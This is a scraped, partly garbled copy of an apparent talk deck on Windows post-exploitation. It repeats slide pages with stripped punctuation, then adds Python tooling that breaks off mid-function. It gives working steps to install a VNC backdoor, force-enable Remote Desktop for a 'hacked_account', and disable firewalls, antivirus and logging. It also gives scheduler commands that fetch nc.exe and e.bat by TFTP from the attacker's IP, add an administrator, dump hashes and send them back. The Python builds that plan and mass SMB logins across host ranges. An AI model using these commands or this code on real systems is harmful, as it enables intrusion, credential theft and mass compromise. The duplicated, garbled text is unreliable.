• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – the theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore, especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 40: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 41: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 42: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification

• Enabling VNC (from the command line)
– Go get VNC (check out guh.nu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder:
  • winvnc.exe
  • vnc.reg
  • vnchooks.dll
  • omnithread_rt.dll
– regedit /s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected" (the hex Password value below is WinVNC's obfuscated form of that string; it is reversible, not a hash, so anyone who can read the key can recover it)

vnc.reg file contents (preceded by the usual REGEDIT4 or "Windows Registry Editor Version 5.00" header line):

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
  • Ex: a system controlling access to security doors
  – No command-line way of modifying the system; you need the GUI
  • SCADA systems
  • Security cameras
  • Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =

– This file will fix the policy settings that are in your way
– Change "hacked_account" to a real account
– Caveat: a [Privilege Rights] entry replaces the existing assignment rather than adding to it, so every other account or group that held these logon rights loses them when the template is applied

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

– Then perform these commands:
  sc config termservice start= auto
  regedit /s enable_ts.reg
  copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
  copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
  secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
  gpupdate /force
  net start "terminal services"

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Old-school techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
– The Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
– ClipBook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled

  net use \\target\ipc$ password /user:username
  at \\target 12:00pm command
  Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
– Enable and start services
– Transfer files
– Add users
– Mess with the registry and policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT: flow
  • Establish an authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
– net use \\target
– net time \\target
– at \\target (net time + 1 min) "tftp -i use GET e.bat"
– at \\target (net time + 2 min) e.bat
– e.bat does:
  • Adds a user (net user hacked hacked /add)
  – Admin group (net localgroup administrators hacked /add)
  • Gets hash-dumping tools and dumps hashes
  • Sends hashes, identified by IP, back to the attacker host
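Slides 60 and 61 give the flow but not the one piece a tool built on AT actually has to get right: turning the target's `net time` output into an AT time with a safe margin, including across midnight. The following Python is an added example written for this page, not code from the talk or from the AtAbuse tool it mentions; the `net time` output, the host name TARGET, the attacker address 10.0.0.5 and the file name e.bat are constructed placeholders.

```python
"""Scheduling helpers for an AT-based post-exploitation 'shell'.

Added example, not code from the deck or the AtAbuse tool it mentions. at.exe
takes a wall-clock time, not a delay, so the tool must read the target's clock
with 'net time', add a margin, and hand at.exe that time in HH:MM form. Host
names, the attacker address and 'e.bat' are placeholders.
"""
import re
from datetime import datetime, timedelta
from typing import List

# Constructed sample of 'net time \\TARGET' output (same layout as XP/2003;
# the host and timestamp are made up). Note the time is 30 s before midnight.
SAMPLE_NET_TIME = (
    "Current time at \\\\TARGET is 3/14/2008 11:59:30 PM\r\n"
    "\r\nThe command completed successfully.\r\n"
)

_NET_TIME_RE = re.compile(
    r"Current time at \\\\\S+ is (\d{1,2}/\d{1,2}/\d{4}) (\d{1,2}:\d{2}:\d{2}) ([AP]M)"
)


def parse_net_time(output: str) -> datetime:
    """Return the target's local time as reported by 'net time'."""
    m = _NET_TIME_RE.search(output)
    if not m:
        raise ValueError("unrecognised 'net time' output: %r" % output)
    return datetime.strptime(" ".join(m.groups()), "%m/%d/%Y %I:%M:%S %p")


def at_time(target_now: datetime, minutes_ahead: int) -> str:
    """Format target_now + minutes_ahead as the 24h HH:MM that at.exe accepts.

    AT has one-minute resolution. Rounding *up* to the next whole minute means
    the job is never closer than minutes_ahead minutes; truncating could put it
    seconds away, and a time that has already passed when the request lands is
    silently queued for tomorrow. Midnight is handled the same way: 23:59:30
    plus one minute becomes 00:01, which AT schedules for the next day.
    """
    when = target_now + timedelta(minutes=minutes_ahead)
    if when.second or when.microsecond:
        when = when.replace(second=0, microsecond=0) + timedelta(minutes=1)
    return when.strftime("%H:%M")


def build_at_plan(target: str, attacker_ip: str, target_now: datetime,
                  user: str = "username", password: str = "password") -> List[str]:
    """The slide-61 sequence: session, fetch e.bat via TFTP at +1 min, run it at +2 min."""
    return [
        f"net use \\\\{target}\\ipc$ {password} /user:{user}",
        f"net time \\\\{target}",
        f'at \\\\{target} {at_time(target_now, 1)} "tftp -i {attacker_ip} GET e.bat"',
        f"at \\\\{target} {at_time(target_now, 2)} e.bat",
    ]


def build_payload_batch() -> str:
    """Contents of e.bat from slide 61. The hash-dump and exfil step is left as a
    comment line because the deck names no particular tool for it."""
    return "\r\n".join([
        "@echo off",
        "net user hacked hacked /add",
        "net localgroup administrators hacked /add",
        "rem dump hashes here and tftp them back, tagged with this host's IP",
    ]) + "\r\n"


if __name__ == "__main__":
    now = parse_net_time(SAMPLE_NET_TIME)
    print("\n".join(build_at_plan("TARGET", "10.0.0.5", now)))
    print(build_payload_batch())
```

Reading the target's clock rather than your own matters more than it looks: AT schedules against the target's local time, so a tool that uses the attacker's clock on a host in a different time zone, or one whose clock drifts, will either fire a day late or not at all.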

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use and re-use
– Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – establish NetBIOS session credentials on a range of hosts
• MassWinenum – enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – use the scheduler as your "shell" to control ranges of hosts
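MassNetUse is only named on the slide. As an added example written for this page (not the authors' tool), here is the shape such a thing takes in Python: expand a range, run `net use` per host through a thread pool, and triage net.exe's output so that only hosts that actually accepted the session are handed on to the AT stage, while bad-credential and unreachable hosts are kept apart for a retry with the next password set. The `runner` callable is injected so the triage logic can be exercised offline with constructed responses; `default_runner` is what you would pass on a Windows host. The addresses and canned output are made up.

```python
"""Establish SMB sessions against a range of hosts and triage the results.

Added example in the spirit of the deck's MassNetUse, not that tool's code. The
command is executed through an injected `runner` so the triage logic runs
offline here against canned output; `default_runner` is the real thing for a
Windows host. The canned messages are constructed to match what net.exe prints
on XP/2003 for the common outcomes.
"""
import ipaddress
import subprocess
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List

# Substrings of net.exe output mapped to the label a mass tool keeps. The
# trailing space after the error number stops 'System error 5 ' matching 53.
OUTCOMES = [
    ("The command completed successfully", "ok"),
    ("System error 5 ", "access_denied"),          # valid creds, no access
    ("System error 53 ", "unreachable"),           # network path not found
    ("System error 1219 ", "conflicting_session"), # already connected as someone else
    ("System error 1326 ", "bad_credentials"),     # logon failure
]


def classify(output: str) -> str:
    for needle, label in OUTCOMES:
        if needle in output:
            return label
    return "unknown"


def expand_targets(spec: str) -> List[str]:
    """'192.168.1.0/30, 10.0.0.7' -> usable host addresses, in order."""
    hosts: List[str] = []
    for part in (p.strip() for p in spec.split(",")):
        if not part:
            continue
        if "/" in part:
            hosts.extend(str(h) for h in ipaddress.ip_network(part, strict=False).hosts())
        else:
            hosts.append(str(ipaddress.ip_address(part)))
    return hosts


def net_use_cmd(host: str, user: str, password: str) -> List[str]:
    return ["net", "use", f"\\\\{host}\\ipc$", password, f"/user:{user}"]


def default_runner(cmd: List[str], timeout: int = 30) -> str:
    """Run net.exe for real (Windows). stderr is included: the error text goes there."""
    proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    return proc.stdout + proc.stderr


def mass_net_use(hosts: List[str], user: str, password: str,
                 runner: Callable[[List[str]], str], workers: int = 16) -> Dict[str, str]:
    """Try every host concurrently; one hung or crashed net.exe must not end the run."""
    def one(host: str):
        try:
            return host, classify(runner(net_use_cmd(host, user, password)))
        except Exception as exc:  # timeout, missing binary, ...
            return host, f"error:{type(exc).__name__}"
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(one, hosts))


# Constructed responses standing in for three hosts in the range below.
CANNED = {
    "192.168.1.1": "The command completed successfully.\r\n",
    "192.168.1.2": "System error 53 has occurred.\r\n\r\nThe network path was not found.\r\n",
    "10.0.0.7": "System error 1326 has occurred.\r\n\r\n"
                "Logon failure: unknown user name or bad password.\r\n",
}


def canned_runner(cmd: List[str]) -> str:
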